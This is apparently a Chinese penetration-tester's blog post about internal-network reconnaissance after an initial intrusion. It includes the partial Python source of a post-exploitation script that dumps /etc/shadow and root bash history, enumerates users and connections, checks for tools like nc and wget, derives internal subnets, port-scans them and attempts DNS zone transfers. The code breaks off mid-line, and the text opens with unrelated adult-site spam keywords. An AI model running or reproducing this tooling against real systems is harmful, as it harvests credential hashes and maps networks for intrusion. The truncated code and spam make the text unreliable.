国产精品香蕉在线观看网,亚洲欧美精品综合在线观看,亚洲不卡av一区二区无码不卡,亚洲日本精品国产第一区二区

　　滲透測試從互聯(lián)網(wǎng)找到了入侵內(nèi)網(wǎng)的入口點之后剩下的就內(nèi)網(wǎng)滲透測試了。

　　有人說到了內(nèi)網(wǎng)還不容易，隨便拿個hscan一抓一大把弱口令。我同意這個看法，但是在我看來，內(nèi)網(wǎng)環(huán)境復(fù)雜得多，要想精確獲取自己想要的目標，要處理的內(nèi)容要多得多，只有獲得了必要的信息，才有的抓的目標，我認為一般內(nèi)網(wǎng)環(huán)境中的滲透測試最難和最重要的是精確的信息收集，剩下的自然可以順理成章的進行常規(guī)的漏洞掃描和利用。如果有一張詳細的資產(chǎn)列表、網(wǎng)絡(luò)規(guī)劃圖和對應(yīng)的密碼列表，就沒必要滲透了，直接獲取各種權(quán)限就得了，但這樣的幾率很小，但是也是可能的，只要時間允許，也可以做郵件監(jiān)控、社工分析等，但這是另外一回事了。

　　在做內(nèi)網(wǎng)滲透的時候，發(fā)現(xiàn)自己開始就是不停的敲命令：查看IP看看跳板是不是在內(nèi)網(wǎng)環(huán)境中、ping8.8.8.8看看是否能外連、netstat看看內(nèi)網(wǎng)連接的IP地址、查看hosts文件有沒有hosts綁定信息、arp-a查看arp列表、traceroute查看路由可達性、nslookup查看dns解析、find命令查找數(shù)據(jù)庫配置信息和敏感文件等等。這些其實都是很簡單的操作，沒什么技術(shù)含量，但是感覺每次測試都會花很多時間去處理，筆記弄得的很亂。所以現(xiàn)在決定自己弄個腳本自動跑跑，最后弄個統(tǒng)一輸出文檔，提高工作效率。敬請期待。

　　第一版寫得比較爛，但基本能用，會逐漸改進

　　【v1功能如下：

　　1、獲取主機信息+dns域傳送漏洞利用+root口令嗅探(需要自己調(diào)用下代碼)

　　2、獲取內(nèi)網(wǎng)網(wǎng)段收集+存活ip判斷(多線程)+常用端口掃描(多線程)

　　bug : linux下的語法有些報錯、linux下的ip存活判斷有些問題

　　【v2更新計劃：

　　1、修復(fù)v1存在的bug和編碼問題

　　2、增加敏感文件和配置文件搜索功能

　　3、弱口令掃描功能

　　【v3更新計劃：

　　1、修復(fù)v2bug

　　2、增加arp嗅探功能

　　3、報告輸出+交互式美化

　　【v4更新計劃：

　　1、修復(fù)v3bug

　　2、改進代碼效率

　　下面是v1版本的源碼,一個很長的類,本來輸出內(nèi)容是中文提示，后來發(fā)現(xiàn)在一些linux上是亂碼，索性改成了英文：

　　#!/usr/bin/python # -*- coding: cp936 -*- #coding:utf-8 import os import getpass import time import socket import re '''''for portscan''' from threading import Thread from Queue import Queue import platform import types from subprocess import Popen, PIPE '''''for dns''' import struct import sys class InScaner: def __init__(self,domain): self.NUM = 200 self._re_IP = r'\d+\.\d+\.\d+\.\d+' self._re_startwithIP = r'^\d+\.\d+\.\d+\.\d+.*' self._re_network = r'^\d+\.\d+\.\d+' self.re_ip = re.compile(self._re_IP) self.re_startwithIP = re.compile(self._re_startwithIP) self.re_network = re.compile(self._re_network) self.host_ip = socket.gethostbyname(socket.gethostname()) self.domain = domain self.path=os.getcwd() self.host_hostname = ''#os.popen('hostname').read() self.host_id = ''#os.popen('id').read() self.host_userlist=[] self.host_useronline='' self.host_last='' self.host_systemId = ''#os.popen('uname -a').read() self.host_systemversion = '' self.host_shadow = '' self.host_issue = '' self.host_bash_history = [] self.host_services = '' #未進行識別 self.host_ESTABLISHEDlink = '' self.host_hackCmd = [] self.host_complie = [] self.dns=[] #self.dns=['58.83.193.214'] self.etc_hosts=[] self.ifconfig='' self.arp='' self.route='' self.inerwww='' self.internetout='' self.keyip=[] self.keyipmaybe=[] self.networkmaybe=[] self.network = []#192.168.1.0格式 self.q = Queue() self.s = Queue() self.networkIPlistA = [] self.portlist = [21,22,23,25,80,81,443,1433,1521,3306,3398,5800,5900,5901,5902,6379,7001,7002,7070,8080,8081,8181,8888,9090,9200,27017,28018] self.networkIP_portOpen={} self.networkIP_weakPass={} def HostInfoGet(self): print '###################Get localhost information####################' print '#####localhost IP####' print self.host_ip+'\n' _hostcmdList = [ 'hostname',#主機名 'id', #用戶id ''''' cat /etc/passwd|grep -v nologin|grep -v halt|grep -v shutdown|awk -F":" '{ print $1"|"$3"|"$4}' ''', 'w', 'last', 'uname -a', 'cat /etc/issue', ] print '#####Get hostname#####' self.host_hostname = os.popen(_hostcmdList[0]).read() print self.host_hostname print '#####Get current user#####' self.host_id = os.popen(_hostcmdList[1]).read() print self.host_id print '#####Get users informaintion#####' userlist = os.popen(_hostcmdList[2]).read() self.host_userlist = userlist.split('\n') print userlist print '#####Get online users list#####' self.host_useronline = os.popen(_hostcmdList[3]).read() print self.host_useronline print '#####Get users login history#####' self.host_last = os.popen(_hostcmdList[4]).read() print self.host_last print '#####Get linux kernel version#####' self.host_systemId = os.popen(_hostcmdList[5]).read() print self.host_systemId print '#####Get linux press version#####' self.host_systemversion = os.popen(_hostcmdList[6]).read() print self.host_systemversion print '#####Get import local files#####' _hostfileList = [ 'cat /etc/shadow', 'cat ~/.bash_history', 'cat /root/.bash_history' ] print '#####Get shadow#####' self.host_shadow = os.popen(_hostfileList[0]).read() print self.host_shadow print '#####Get bash_history#####' self.host_bash_history.append(os.popen(_hostfileList[1]).read()) self.host_bash_history.append(os.popen(_hostfileList[2]).read()) print '###Get too much###' _servicecmdlist = [ 'netstat -antlp', ''''' netstat -antlp | grep 'ESTABLISHED' ''' ] print '#####Get system services and listening Port#####' self.host_services = os.popen(_servicecmdlist[0]).read() print self.host_services print '#####Get network ESTABLISHED#####' self.host_ESTABLISHEDlink = os.popen(_servicecmdlist[1]).read() print self.host_ESTABLISHEDlink print '#####Get cmd can be used#####' _host_hackSoft = [ 'nmap', 'nc', 'netcat', 'wget', 'tcpdump', 'wireshark', 'rpm', 'yum', 'apt-get', 'ftp', 'ssh', 'telnet', 'scp', 'nslookup' ] for cmd in _host_hackSoft: typecmd = 'type '+cmd+' >/dev/null' try: out = os.system(typecmd) if 0 == out: self.host_hackCmd.append(cmd) print '%s is ok' % cmd except: print '%s is unused' % cmd print '###################Get localhost information finished####################\n' def mgFileGet(self): print '##########獲取口令密碼文件中。。。。。。##########' print 'PHP' print 'tomcat' print 'apache' print 'struts' print 'jboss' print 'weblogic' print 'ftp' print 'ssh' print 'vnc' print 'mysql' print 'oracle' print 'search' pass def NetworkInfoGet(self): print '####################Get network information####################' _netfileListCat = [ 'cat /etc/hosts', 'cat /etc/resolv.conf', ] print '######Get DNS server IP#####' self.dns = self.re_ip.findall(os.popen(_netfileListCat[1]).read()) for dns in self.dns: print dns print '#####Get /etc/hosts list#####' hosts = os.popen(_netfileListCat[0]).read().split('\n') for host in hosts: #print host _host=self.re_startwithIP.findall(host) if _host!=[]: self.etc_hosts += _host for host in self.etc_hosts: print host _netcmdList = [ 'ifconfig -a', 'arp -a', 'route -n', 'ping %s -c 2' % self.domain, 'ping 114.114.114.114 -c 2' ] print '#####Get localhost ip and interface information#####' self.ifconfig = os.popen(_netcmdList[0]).read() print self.ifconfig print '#####Get arp list#####' self.arp = os.popen(_netcmdList[1]).read() print self.arp print '#####Get route information#####' self.route = os.popen(_netcmdList[2]).read() print self.route print '#####Get innerDNSresolve test#####' self.inerwww = os.popen(_netcmdList[3]).read() print self.inerwww print '#####Can search the Internet or not#####' self.internetout = os.popen(_netcmdList[4]).read() print self.internetout print '#####DNS test#####' if self.dns == []: print 'sorry,we have no the dns ip' else: for dnsip in self.dns: print '###dns %s results###' % dnsip try: self.GetDomainList(dnsip,self.domain) except: print '##dns test failed##' #獲取DNS域傳送信息 print '#####Network exist#####' #先收集所有結(jié)果中的IP地址，去掉排除的ip地址后，把ip地址轉(zhuǎn)換為網(wǎng)段，之后去重，最后保存 ip = [] keyip = [] keyipmaybe =[] network = [] keynetwork = [] keynetworkmaybe = [] _ex_ip =[ '127.0.0.1', '0.0.0.0', '255.255.255.255', '255.255.255.0', '255.255.0.0', '255.0.0.0', '127.0.1.1', '8.8.8.8', '114.114.114.114' ] _iplistsearch = [ self.host_useronline, self.host_last, self.host_services, self.host_ESTABLISHEDlink, self.dns, self.etc_hosts, self.ifconfig, self.arp, self.route, self.inerwww ] _iplistsearchmaybe = [ self.host_bash_history ] for text in _iplistsearchmaybe: if type(text) == type('1'): ip+=self.__getIPinStr(text) elif type(text) == type(['1']): for text2 in text: ip+=self.__getIPinStr(text2) [keyipmaybe.append(ipnew) for ipnew in ip if ipnew not in (keyipmaybe+_ex_ip)]#ip地址處理 self.keyipmaybe = keyipmaybe #變量中的IP并去重，去無效IP ip = [] for text in _iplistsearch: if type(text) == type('1'): ip+=self.__getIPinStr(text) elif type(text) == type(['1']): for text2 in text: ip+=self.__getIPinStr(text2) [keyip.append(ipnew) for ipnew in ip if ipnew not in (keyip+_ex_ip)]#ip地址處理 #將IP地址轉(zhuǎn)換為網(wǎng)段，并去重 self.keyip = keyip _ex_network =[ '127.0.0.0' ] for netip in self.keyipmaybe: network.append(self.__ip2network(netip)) [keynetworkmaybe.append(net) for net in network if net not in keynetworkmaybe+_ex_network] network = [] for netip in self.keyip: network.append(self.__ip2network(netip)) [keynetwork.append(net) for net in network if net not in keynetwork+_ex_network] #篩選出私有IP地址 _privatNet = [ '172', '192', '10' ] print "network may exist:" for net in keynetworkmaybe: netsplit = net.split('.') if netsplit[0] in _privatNet: print net self.networkmaybe.append(net) print "network exists ensure:" for net in keynetwork: netsplit = net.split('.') if netsplit[0] in _privatNet: print net self.network.append(net) def __ip2network(self,ip): return self.re_network.findall(ip)[0]+'.0' def __getIPinStr(self,string): ip = self.re_ip.findall(string) return ip __LEN_QUERY = 0 # Length of Query String def __gen_query(self,domain): import random TRANS_ID = random.randint(1, 65535) # random ID FLAGS = 0; QDCOUNT = 1; ANCOUNT = 0; NSCOUNT = 0; ARCOUNT = 0 data = struct.pack( '!HHHHHH', TRANS_ID, FLAGS,QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT ) query = '' for label in domain.strip().split('.'): query += struct.pack('!B', len(label)) + label.lower() query += '\x00' # end of domain name data += query global __LEN_QUERY __LEN_QUERY = len(query) # length of query section q_type = 252 # Type AXFR = 252 q_class = 1 # CLASS IN data += struct.pack('!HH', q_type, q_class) data = struct.pack('!H', len(data) ) + data # first 2 bytes should be length return data __OFFvSET = 0 # Response Data offset __TYPES = {1: 'A', 2: 'NS', 5: 'CNAME', 6: 'SOA', 12: 'PTR', 15: 'MX', 16: 'TXT', 28: 'AAAA', 38: 'A6', 99: 'SPF',} def __decode(self,response): RCODE = struct.unpack('!H',response[2:4])[0] & 0b00001111 if RCODE != 0: print 'Transfer Failed. %>_